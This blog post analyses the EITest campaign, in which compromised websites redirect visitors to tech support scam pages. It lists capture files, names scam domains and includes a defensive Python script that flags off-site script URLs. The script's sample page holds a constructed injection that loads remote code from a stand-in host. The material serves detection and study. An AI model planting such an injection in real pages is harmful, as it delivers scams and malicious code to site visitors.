2017-05-30 - EITEST CAMPAIGN PUSHING TECH SUPPORT SCAMS, RIG EK, HOEFLERTEXT POPUPS

ASSOCIATED FILES:

  • 2017-05-29-EITest-script-for-tech-scam-after-amormariano.com.br-UK-based-traffic.pcap   (472,332 bytes)
  • 2017-05-30-EITest-script-for-tech-scam-after-amormariano.com.br-US-based-traffic-1st-run.pcap   (898,744 bytes)
  • 2017-05-30-EITest-script-for-tech-scam-after-amormariano.com.br-US-based-traffic-2nd-run.pcap   (883,541 bytes)
  • 2017-05-29-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-UK.txt   (237,041 bytes)
  • 2017-05-29-tech-support-scam-page-UK.mp3   (164,773 bytes)
  • 2017-05-29-tech-support-scam-page-UK.txt   (45,831 bytes)
  • 2017-05-30-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-US-1st-run.txt   (237,019 bytes)
  • 2017-05-30-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-US-2nd-run.txt   (237,018 bytes)
  • 2017-05-30-tech-support-scam-page-US.mp3   (589,824 bytes)
  • 2017-05-30-tech-support-scam-page-US.txt   (4,978 bytes)

 

NOTES:


Shown above:  Updated my chart, because I saw EITest Rig EK while operating from a US location as my source IP address.

 

CHECKING AN EITEST-COMPROMISED SITE FROM A LOCATION IN THE UNITED STATES (US)


Shown above:  Example of injected script in a page from the compromised website.  The highlighted URL leads to a tech support scam page.
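The injected script itself survives on this page only as a screenshot. As an added example (not the author's code, and not a script from the EITest campaign), here is a small Python check that does what the analyst did by eye: it reads a saved copy of a page (such as the .txt page captures listed under associated files), collects every `<script src=...>` reference and every plaintext URL inside inline script bodies, and reports the ones whose host is not the site's own. The sample page, the hostnames `compromised.example`, `cdn.example.net` and `injected.example`, and the allowlist are constructed placeholders, not indicators from the post. It only catches URLs that appear in clear; an injection that assembles the URL at runtime needs to be read by hand.

```python
"""Flag script references in a saved HTML page that point off-site.

Added example, not from the original post.  Assumes the page was saved as
raw HTML (like the .txt page captures listed above) and that the site's own
hostname is known.  All hostnames and page content below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Plaintext URLs inside inline script bodies.  Stops at quotes and angle brackets.
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect <script src> values and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external_src = []   # values of <script src="...">
        self.inline = []         # bodies of inline <script> ... </script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external_src.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands the raw script body to handle_data (CDATA mode).
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_offsite_script_urls(html, site_host, allow=()):
    """Return (kind, host, url) for script URLs whose host is not site_host.

    kind is "src" for <script src> references and "inline" for URLs found in
    inline script bodies.  Relative URLs (no host) are treated as same-site.
    Hosts in `allow` (e.g. a CDN you have vetted) are skipped.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()

    candidates = [("src", url) for url in parser.external_src]
    for body in parser.inline:
        candidates.extend(("inline", url) for url in URL_RE.findall(body))

    found = []
    for kind, url in candidates:
        host = urlparse(url).hostname
        if host is None:                      # relative URL -> same site
            continue
        host = host.lower()
        if host == site_host or host.endswith("." + site_host):
            continue
        if host in allow:
            continue
        found.append((kind, host, url))
    return found


# Constructed sample: one same-site script, one CDN script, and an inline
# injection that appends a script element pointing at an off-site host.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example.net/jquery.min.js"></script>
</head><body>
<p>Page text</p>
<script type="text/javascript">
var a = document.createElement('script');
a.src = 'https://injected.example/path/?id=123';
document.body.appendChild(a);
</script>
</body></html>"""


if __name__ == "__main__":
    # Example usage: python this_script.py  (or adapt to read a saved page file)
    for kind, host, url in find_offsite_script_urls(SAMPLE_PAGE, "compromised.example"):
        print(f"{kind:6} {host:22} {url}")
```

Run it against a saved page with the site's hostname as `site_host`; anything reported that is not a CDN or analytics host you already know belongs on the page deserves a closer look, which is exactly how the injected EITest reference stands out in the screenshots.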

 



Shown above:  Examples of the traffic filtered in Wireshark.

 


Shown above:  Screenshot of the tech support scam page (US style).  New phone number today.

 


Shown above:  Screenshot of the tech support scam page with the notification pop-up (US style).

 

CHECKING AN EITEST-COMPROMISED SITE FROM A LOCATION IN THE UNITED KINGDOM (UK)


Shown above:  Injected script in a page from the compromised website.  The highlighted URL leads to a tech support scam page.

 


Shown above:  Traffic filtered in Wireshark.  NOTE: As before, I had to manually copy and paste the gio.aquastring.bid
URL into a browser.  It did not happen automatically.

 


Shown above:  The gio.zenoricher.bid URL redirects to an HTTPS URL.

 


Shown above:  Screenshot of the tech support scam page (UK style).

 


Shown above:  Screenshot of the tech support scam page with the notification pop-up (UK style).

 

INDICATORS

The following are indicators associated with this activity.

 

OTHER PICS


Shown above:  An example of the HoeflerText popup on a site compromised by the EITest campaign.  No binary (Font_Chrome.exe or otherwise) was returned.

 


Shown above:  This is the type of injected EITest script I saw, where I accidentally recorded over the pcap.

 

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
